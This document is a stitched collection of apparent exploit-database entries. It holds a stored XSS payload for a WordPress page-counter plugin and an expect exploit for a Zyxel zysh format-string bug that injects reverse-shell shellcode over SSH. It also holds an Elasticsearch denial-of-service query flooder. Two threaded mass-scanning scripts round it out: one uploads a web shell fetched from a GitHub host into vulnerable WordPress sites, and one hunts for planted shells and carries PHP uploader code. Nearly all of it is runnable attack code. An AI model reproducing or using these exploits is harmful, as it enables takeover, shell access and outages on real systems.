doesn’t require you to create an account on another site. All features outlined below are included in the free plugin. Description of the owner of the plugin Stored Cross-Site Scripting attack against the administrators or the other authenticated users. The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) The details of the discovery are given below. # Steps To Reproduce: 1. Install and activate the Advanced Page Visit Counter plugin. 2. Visit the "Settings" interface available in settings page of the plugin that is named "Widget Settings" 3. In the plugin's "Today's Count Label" setting field, enter the payload Payload: " "type=image src=1 onerror=alert(document.cookie)> " 6. Click the "Save Changes" button. 7. The XSS will be triggered on the settings page when every visit of an authenticated user. # Video Link https://youtu.be/zcfciGZLriM

#!/usr/bin/expect -f # # raptor_zysh_fhtagn.exp - zysh format string PoC exploit # Copyright (c) 2022 Marco Ivaldi <[email protected]> # # "We live on a placid island of ignorance in the midst of black seas of # infinity, and it was not meant that we should voyage far." # -- H. P. Lovecraft, The Call of Cthulhu # # "Multiple improper input validation flaws were identified in some CLI # commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, # USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware # versions 4.32 through 5.21, VPN series firmware versions 4.30 through # 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 # firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware # version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version # 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) # and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and # earlier versions, that could allow a local authenticated attacker to # cause a buffer overflow or a system crash via a crafted payload." # -- CVE-2022-26531 # # The zysh binary is a restricted shell that implements the command-line # interface (CLI) on multiple Zyxel products. This proof-of-concept exploit # demonstrates how to leverage the format string bugs I have identified in # the "extension" argument of some zysh commands, to execute arbitrary code # and escape the restricted shell environment. # # - This exploit targets the "ping" zysh command. # - It overwrites the .got entry of fork() with the shellcode address. # - The shellcode address is calculated based on a leaked stack address. # - Hardcoded offsets and values might need some tweaking, see comments. # - Automation/weaponization for other targets is left as an exercise. # # For additional details on my bug hunting journey and on the # vulnerabilities themselves, you can refer to the official advisory: # https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt # # Usage: # raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password # raptor_zysh_fhtagn.exp - zysh format string PoC exploit # Copyright (c) 2022 Marco Ivaldi <[email protected]> # # Leaked stack address: 0x7fe97170 # Shellcode address: 0x7fe9de40 # Base string length: 46 # Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn # # *** enjoy your shell! *** # # sh-5.1$ uname -snrmp # Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0 # sh-5.1$ id # uid=10007(admin) gid=10000(operator) groups=10000(operator) # # Tested on: # Zyxel USG20-VPN with Firmware 5.10 # [other appliances/versions are also likely vulnerable] # # change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8 encoding system iso8859-1 # hostile format string to leak stack address via direct parameter access set offset1 77 set leak [format "AAAA.0x%%%d\$x" $offset1] # offsets to reach addresses in retloc sled via direct parameter access set offset2 1801 set offset3 [expr $offset2 + 1] # difference between leaked stack address and shellcode address set diff 27856 # retloc sled # $ mips64-linux-readelf -a zysh | grep JUMP | grep fork # 112dd558 0000967f R_MIPS_JUMP_SLOT 00000000 fork@GLIBC_2.0 # ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2] set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024] # nop sled # nop-equivalent instruction: xor $t0, $t0, $t0 set nops [string repeat "\x01\x8c\x60\x26" 64] # shellcode # https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c" # padding to align payload in memory (might need adjusting) set padding "AAA" # print header send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n" send_user "Copyright (c) 2022 Marco Ivaldi <[email protected]>\n\n" # check command line if { [llength $argv] != 3} { send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n" exit 1 } # get SSH connection parameters set port "22" set host [lindex $argv 0] set user [lindex $argv 1] set pass [lindex $argv 2] # inject payload via the TERM environment variable set env(TERM) $retloc$nops$sc$padding # connect to target via SSH log_user 0 spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user expect { -nocase "password*" { send "$pass\r" } default { send_error "error: could not connect to ssh\n" exit 1 } } # leak stack address expect { "Router? $" { send "ping 127.0.0.1 extension $leak\r" } default { send_error "error: could not access zysh prompt\n" exit 1 } } expect { -re "ping: unknown host AAAA\.(0x.*)\r\n" { } default { send_error "error: could not leak stack address\n" exit 1 } } set leaked $expect_out(1,string) send_user "Leaked stack address:\t$leaked\n" # calculate shellcode address set retval [expr $leaked + $diff] set retval [format 0x%x $retval] send_user "Shellcode address:\t$retval\n" # extract each byte of shellcode address set b1 [expr ($retval & 0xff000000) >> 24] set b2 [expr ($retval & 0x00ff0000) >> 16] set b3 [expr ($retval & 0x0000ff00) >> 8] set b4 [expr ($retval & 0x000000ff)] set b1 [format 0x%x $b1] set b2 [format 0x%x $b2] set b3 [format 0x%x $b3] set b4 [format 0x%x $b4] # calculate numeric arguments for the hostile format string set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3 "] send_user "Base string length:\t$base\n" set n1 [expr ($b4 - $base) % 0x100] set n2 [expr ($b2 - $b4) % 0x100] set n3 [expr ($b1 - $b2) % 0x100] set n4 [expr ($b3 - $b1) % 0x100] # check for dangerous numeric arguments below 10 if {$n1 < 10} { incr n1 0x100 } if {$n2 < 10} { incr n2 0x100 } if {$n3 < 10} { incr n3 0x100 } if {$n4 < 10} { incr n4 0x100 } # craft the hostile format string set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4] send_user "Hostile format string:\t$exploit\n\n" # uncomment to debug # interact + # exploit target set prompt "(#|\\\$) $" expect { "Router? $" { send "ping 127.0.0.1 extension $exploit\r" } default { send_error "error: could not access zysh prompt\n" exit 1 } } expect { "Router? $" { send_error "error: could not exploit target\n" exit 1 } -re $prompt { send_user "*** enjoy your shell! ***\n" send "\r" interact } default { send_error "error: could not exploit target\n" exit 1 } }

# Exploit Author: TOUHAMI KASBAOUI # Vendor Homepage: https://elastic.co/ # Version: 8.5.3 / OpenSearch # Tested on: Ubuntu 20.04 LTS # CVE : CVE-2023-31419 # Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419 import requests import random import string es_url = 'http://localhost:9200' # Replace with your Elasticsearch server URL index_name = '*' payload = "/*" * 10000 + "\\" +"'" * 999 verify_ssl = False username = 'elastic' password = 'changeme' auth = (username, password) num_queries = 100 for _ in range(num_queries): symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000)) search_query = { "query": { "match": { "message": (symbols * 9000) + payload } } } print(f"Query {_ + 1} - Search Query:") search_endpoint = f'{es_url}/{index_name}/_search' response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth) if response.status_code == 200: search_results = response.json() print(f"Query {_ + 1} - Response:") print(search_results) total_hits = search_results['hits']['total']['value'] print(f"Query {_ + 1}: Total hits: {total_hits}") for hit in search_results['hits']['hits']: source_data = hit['_source'] print("Payload result: {search_results}") else: print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")

# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated # Date: 2023-09-20 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import requests as req import json import sys import random import uuid import urllib.parse import urllib3 from multiprocessing.dummy import Pool as ThreadPool urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) filename="{}.php".format(str(uuid.uuid4())[:8]) proxies = {} #proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080', #} phash = "l1_Lw" r=req.Session() user_agent={ "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" } r.headers.update(user_agent) def is_json(myjson): try: json_object = json.loads(myjson) except ValueError as e: return False return True def mkfile(target): data={"cmd" : "mkfile", "target":phash, "name":filename} resp=r.post(target, data=data) respon = resp.text if resp.status_code == 200 and is_json(respon): resp_json=respon.replace(r"\/", "").replace("\\", "") resp_json=json.loads(resp_json) return resp_json["added"][0]["hash"] else: return False def put(target, hash): content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False) content=content.text data={"cmd" : "put", "target":hash, "content": content} respon=r.post(target, data=data, proxies=proxies, verify=False) if respon.status_code == 200: return True def exploit(target): try: vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target) respon=r.get(vuln_path, proxies=proxies, verify=False).status_code if respon != 200: print("[FAIL] {}".format(target)) return hash=mkfile(vuln_path) if hash == False: print("[FAIL] {}".format(target)) return if put(vuln_path, hash): shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename) status = r.get(shell_path, proxies=proxies, verify=False).status_code if status==200 : with open("result.txt", "a") as newline: newline.write("{}\n".format(shell_path)) newline.close() print("[OK] {}".format(shell_path)) return else: print("[FAIL] {}".format(target)) return else: print("[FAIL] {}".format(target)) return except req.exceptions.SSLError: print("[FAIL] {}".format(target)) return except req.exceptions.ConnectionError: print("[FAIL] {}".format(target)) return def main(): threads = input("[?] Threads > ") list_file = input("[?] List websites file > ") print("[!] all result saved in result.txt") with open(list_file, "r") as file: lines = [line.rstrip() for line in file] th = ThreadPool(int(threads)) th.map(exploit, lines) if __name__ == "__main__": main()

# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated # Date: 2023-09-20 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) fr = Fore.RED fc = Fore.CYAN fw = Fore.WHITE fg = Fore.GREEN fm = Fore.MAGENTA shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} try: target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError: path = str(sys.argv[0]).split('\\') exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def FourHundredThree(url): try: url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) except : print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(100) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in Shells.txt'.format(fc)